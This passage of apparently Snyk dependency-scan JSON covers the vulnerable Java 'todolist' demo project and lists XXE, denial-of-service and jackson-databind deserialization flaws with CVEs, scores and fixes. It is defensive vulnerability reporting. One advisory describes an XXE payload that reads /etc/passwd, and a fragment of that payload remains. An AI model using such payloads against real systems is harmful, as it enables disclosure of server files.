"org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { 
- "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "org.hibernate:hibernate-core@4.3.7.Final": { - "upgradeTo": "org.hibernate:hibernate-core@5.4.24.Final", - "upgrades": [ - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1", - "dom4j:dom4j@1.6.1" - ], - "vulns": [ - "SNYK-JAVA-ORGHIBERNATE-1041788", - "SNYK-JAVA-ORGHIBERNATE-584563", - "SNYK-JAVA-DOM4J-174153", - "SNYK-JAVA-DOM4J-2812975" - ] - }, - "org.hsqldb:hsqldb@2.3.2": { - "upgradeTo": "org.hsqldb:hsqldb@2.7.1", - "upgrades": [ - "org.hsqldb:hsqldb@2.3.2" - ], - "vulns": [ - "SNYK-JAVA-ORGHSQLDB-3040860" - ] - }, - "org.springframework:spring-context@3.2.6.RELEASE": { - "upgradeTo": "org.springframework:spring-context@5.2.24.RELEASE", - "upgrades": [ - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "vulns": [ - "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - 
"SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 22, - "projectName": "io.github.snyk:todolist-core", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-core/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": 
"2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": 
"3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - 
"isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": 
"primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 
- "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - 
